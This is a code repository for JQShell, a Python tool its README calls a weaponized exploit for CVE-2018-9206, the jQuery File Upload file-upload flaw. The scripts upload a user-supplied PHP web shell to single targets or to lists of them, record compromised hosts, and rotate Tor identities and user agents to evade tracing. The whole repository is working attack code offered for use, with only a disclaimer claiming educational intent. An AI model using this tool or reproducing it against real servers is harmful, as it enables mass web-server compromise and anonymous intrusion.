├── README.md ├── __pycache__ └── misc.cpython-36.pyc ├── jqshell.py └── misc.py /README.md: -------------------------------------------------------------------------------- 1 | ![alt text](https://i.imgur.com/Gp4QkiN.png) 2 | 3 | **JQShell** 4 | 5 | A weaponized version of CVE-2018-9206. 6 | 7 | **Disclaimer** 8 | 9 | Using this against servers you don't control is illegal in most countries. 10 | The author claims no responsibility for the actions of those who use this software for illegal purposes. 11 | This software is intended for educational use only. 12 | No servers were illegally pwned in the making of this software. 13 | 14 | **Features** 15 | 16 | *Single Target* 17 | *Multi Target* 18 | *Tor* 19 | 20 | **Prerequisites** 21 | 22 | Please install these required packages. 23 | 24 | **Python3** 25 | 26 | ```shell 27 | pip3 install requests pysocks subprocess stem 28 | ``` 29 | **Tor Control Port** 30 | 31 | To use Tor with this script, you must edit your torrc file and enable the Tor control port on 9051. 
32 | 33 | Typically this file is here: /etc/tor/torrc 34 | 35 | Open this file and change this line: 36 | 37 | ```shell 38 | #ControlPort 9051 39 | ``` 40 | 41 | to 42 | 43 | ```shell 44 | ControlPort 9051 45 | ``` 46 | 47 | ```shell 48 | restart tor service 49 | ``` 50 | 51 | **Usage** 52 | 53 | ```shell 54 | usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC 55 | [-o OUTPUTZ] [-tor] 56 | 57 | optional arguments: 58 | -h, --help show this help message and exit 59 | -l LIST_INIT, --list LIST_INIT 60 | Select for a list of assets to exploit 61 | -t SINGLE_TARGET, --target SINGLE_TARGET 62 | Single exploit target 63 | -s SHELL_LOC, --shell SHELL_LOC 64 | This is required, put the fullpath to your shell 65 | -o OUTPUTZ, --output OUTPUTZ 66 | This is full path to were you want to save your list 67 | of confirmed hosts 68 | -tor, --tor_proxy Select if you have tor installed, you will need to 69 | enable control port 70 | ``` 71 | **Examples** 72 | 73 | Running against a single target. 74 | ```shell 75 | python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php 76 | ``` 77 | Running against a single target, with saving output. 78 | ```shell 79 | python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt 80 | ``` 81 | Running a list, with saving output. 
82 | ```shell 83 | python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt 84 | ``` 85 | **Author** 86 | 87 | * **Joshua Whitaker** 88 | * *Twitter* [@_Stahlz](https://twitter.com/_Stahlz) 89 | * *Email* - [stahl@stahl.io](stahl@stahl.io) 90 | * *Website* - [stahl.io](http://stahl.io) 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /__pycache__/misc.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Stahlz/JQShell/47864118e35b2e9e7e7c0daa8d6996019add0e8f/__pycache__/misc.cpython-36.pyc -------------------------------------------------------------------------------- /jqshell.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import subprocess 3 | import argparse 4 | import sys 5 | from misc import redundant 6 | from misc import colors 7 | 8 | """Author: Joshua Whitaker""" 9 | """Twitter: @_Stahlz""" 10 | """Email: stahl@stahl.io""" 11 | 12 | """Initalizing Classes""" 13 | global initall 14 | initall = redundant() 15 | global colors 16 | initcolor = colors() 17 | 18 | """Misc Vars""" 19 | global write_output 20 | write_output = False 21 | global set_tor_reset_interval 22 | set_tor_reset_interval = 5 23 | global tor_count 24 | tor_count = 0 25 | 26 | art = ( 27 | initcolor.OKGREEN + ' ▄▄▄██▀▀▀█████ ██████ ██░ ██ ▓█████ ██▓ ██▓ ' + initcolor.ENDC + '\n' + 28 | initcolor.OKGREEN + ' ▒██ ▒██▓ ██▒▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ ' + initcolor.ENDC + '\n' + 29 | initcolor.OKGREEN + ' ░██ ▒██▒ ██░░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ ' + initcolor.ENDC + '\n' + 30 | initcolor.OKGREEN + '▓██▄██▓░██ █▀ ░ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ ' + initcolor.ENDC + '\n' + 31 | initcolor.OKGREEN + ' ▓███▒ ░▒███▒█▄ ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒' + initcolor.ENDC + '\n' + 32 | initcolor.OKGREEN + ' ▒▓▒▒░ ░░ ▒▒░ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░' + initcolor.ENDC + '\n' + 
33 | initcolor.OKGREEN + ' ▒ ░▒░ ░ ▒░ ░ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░' + initcolor.ENDC + '\n' + 34 | initcolor.OKGREEN + ' ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ' + initcolor.ENDC + '\n' + 35 | initcolor.OKGREEN + ' ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░' + initcolor.ENDC + '\n') 36 | print(art) 37 | 38 | print(initcolor.WARNING + 'Using this agianst servers you dont control, is illegal in most countries.' + initcolor.ENDC) 39 | print(initcolor.WARNING + 'The author claims no responsibility for the actions of those who use this software for illegal purposes.' + initcolor.ENDC) 40 | print(initcolor.WARNING + 'This software is intended for educational use only.' + initcolor.ENDC) 41 | 42 | 43 | """Argparse block""" 44 | parser = argparse.ArgumentParser() 45 | parser.add_argument('-l','--list', dest='list_init', required=False, help='Select for a list of assets to exploit') 46 | parser.add_argument('-t','--target', dest='single_target',required=False, help='Single exploit target') 47 | parser.add_argument('-s','--shell', dest='shell_loc', required=True, help='This is required, put the fullpath to your shell') 48 | parser.add_argument('-o','--output', dest='outputz', required=False, help='This is full path to were you want to save your list of confirmed hosts') 49 | parser.add_argument('-tor','--tor_proxy', action='store_true', dest='torproxy', help='Select if you have tor installed, you will need to enable control port', required=False, default=False) 50 | args = parser.parse_args() 51 | 52 | """If Block for exiting if requirements aern't meant""" 53 | if (args.list_init == None) and (args.single_target == None): 54 | print(initcolor.FAIL + '[-] Please select a list -l or -t for single target' + initcolor.ENDC) 55 | sys.exit() 56 | 57 | if (args.list_init != None) and (args.single_target != None): 58 | print(initcolor.FAIL + '[-] Please select either a list or single target, not both' + initcolor.ENDC) 59 | sys.exit() 60 | 61 | if (args.list_init != None) and 
(args.single_target == None): 62 | with open(args.list_init,'r') as lists: 63 | output = lists.read().splitlines() 64 | 65 | if args.shell_loc == None or '': 66 | print(initcolor.FAIL + '[-] Please put the full path to your shell' + initcolor.ENDC) 67 | sys.exit() 68 | 69 | if args.outputz == None or '': 70 | pass 71 | else: 72 | write_output = True 73 | 74 | if args.torproxy == True: 75 | tor_ps = initall.is_tor_running() 76 | if tor_ps != '' or None: 77 | print(initcolor.OKGREEN + '[*] Tor Proxy Enabled, PID {0}'.format(tor_ps) + initcolor.ENDC) 78 | global proxies 79 | proxies = { 80 | 'http': 'socks5://127.0.0.1:9050', 81 | 'https': 'socks5://127.0.0.1:9050' 82 | } 83 | """Every time the script is run a new ip is requested through the tor control port""" 84 | initall.reset_tor_ip() 85 | print(initcolor.OKGREEN + '[*] Reseting Tor Connection' + initcolor.ENDC) 86 | else: 87 | print(initcolor.FAIL + '[-] Could not find Tor Running, Please Start the Tor Service and re-run' + initcolor.ENDC) 88 | sys.exit() 89 | 90 | 91 | """Session for building concurrency""" 92 | global request 93 | request = requests.Session() 94 | 95 | """Get Shell Name""" 96 | global shell_name 97 | shell_name = initall.shell_name(args.shell_loc) 98 | 99 | """Shell upload to Server""" 100 | global files 101 | files = {'files':('{0}'.format(shell_name), open(args.shell_loc, 'rb'), 'multipart/form-data')} 102 | 103 | def http(domain): 104 | if args.torproxy == True: 105 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, proxies=proxies, headers=initall.random_agent()) 106 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 107 | if upload_shell.status_code == 200: 108 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 109 | if write_output == True: 110 | initall.write_me(args.outputz,shell_location) 111 | elif upload_shell.status_code != 200: 112 | 
print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 113 | elif args.torproxy == False: 114 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, headers=initall.random_agent()) 115 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 116 | if upload_shell.status_code == 200: 117 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 118 | if write_output == True: 119 | initall.write_me(args.outputz,shell_location) 120 | elif upload_shell.status_code != 200: 121 | print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 122 | 123 | def https(domain): 124 | if args.torproxy == True: 125 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, proxies=proxies, headers=initall.random_agent()) 126 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 127 | if upload_shell.status_code == 200: 128 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 129 | if write_output == True: 130 | initall.write_me(args.outputz,shell_location) 131 | elif upload_shell.status_code != 200: 132 | print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 133 | elif args.torproxy == False: 134 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, headers=initall.random_agent()) 135 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 136 | if upload_shell.status_code == 200: 137 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 138 | if write_output == True: 139 | initall.write_me(args.outputz,shell_location) 140 | elif upload_shell.status_code != 200: 141 | 
print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 142 | 143 | """Target Logic""" 144 | if args.single_target != None: 145 | if 'http://' in args.single_target: 146 | http(args.single_target) 147 | elif 'https://' in args.single_target: 148 | https(args.single_target) 149 | else: 150 | domain = 'http://{0}'.format(args.single_target) 151 | http(domain) 152 | elif args.list_init != None: 153 | for domain in output: 154 | if tor_count >= set_tor_reset_interval: 155 | print(initcolor.OKGREEN + '[*] Reseting Tor Connection' + initcolor.ENDC) 156 | initall.reset_tor_ip() 157 | tor_count = 0 158 | if 'http://' in domain: 159 | if args.torproxy == True: 160 | tor_count += 1 161 | http(domain) 162 | elif 'https://' in domain: 163 | if args.torproxy == True: 164 | tor_count += 1 165 | https(domain) 166 | else: 167 | if args.torproxy == True: 168 | tor_count += 1 169 | domain = 'http://{0}'.format(domain) 170 | http(domain) 171 | -------------------------------------------------------------------------------- /misc.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | from random import choice 3 | from stem import Signal 4 | from stem.control import Controller 5 | 6 | class redundant(): 7 | 8 | def __init__(self): 9 | pass 10 | 11 | def reset_tor_ip(self): 12 | with Controller.from_port(port = 9051) as controller: 13 | controller.authenticate() 14 | controller.signal(Signal.NEWNYM) 15 | 16 | def is_tor_running(self): 17 | command = 'ps -ef | grep tor | egrep -v "grep tor" | awk \'{print $2}\'' 18 | psef = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE) 19 | psef = psef.stdout.read().decode('utf-8').strip() 20 | if psef != '' or None: 21 | return psef 22 | else: 23 | return None 24 | 25 | def random_agent(self): 26 | desktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 27 | 
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 28 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 29 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14', 30 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36', 31 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36', 32 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36', 33 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36', 34 | 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 35 | 'Mozilla/5.0 (Linux; U; Android-4.0.3; en-us; Galaxy Nexus Build/IML74K) AppleWebKit/535.7 (KHTML, like Gecko) CrMo/16.0.912.75 Mobile Safari/535.7', 36 | 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-N910F Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36', 37 | 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 38 | 'Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N900 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36', 39 | 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G570Y Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36', 40 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393', 41 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like 
Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1', 42 | 'Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4', 43 | 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko', 44 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; MDDCJS)', 45 | 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)', 46 | 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 47 | 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 48 | 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'] 49 | return {'User-Agent': choice(desktop_agents)} 50 | 51 | def write_me(self,output_file,Domain): 52 | with open("{0}".format(output_file), "a") as myfile: 53 | myfile.write('{0}'.format(Domain) + '\n') 54 | 55 | def shell_name(self,fullpath): 56 | if fullpath.endswith('.php'): 57 | elements = fullpath.rsplit('/') 58 | find_php = list(filter(lambda x:'.php' in x, elements)) 59 | php_found = ''.join(find_php) 60 | return php_found 61 | 62 | class colors: 63 | HEADER = '\033[95m' 64 | OKBLUE = '\033[94m' 65 | OKGREEN = '\033[92m' 66 | WARNING = '\033[93m' 67 | FAIL = '\033[91m' 68 | ENDC = '\033[0m' 69 | BOLD = '\033[1m' 70 | UNDERLINE = '\033[4m' 71 | --------------------------------------------------------------------------------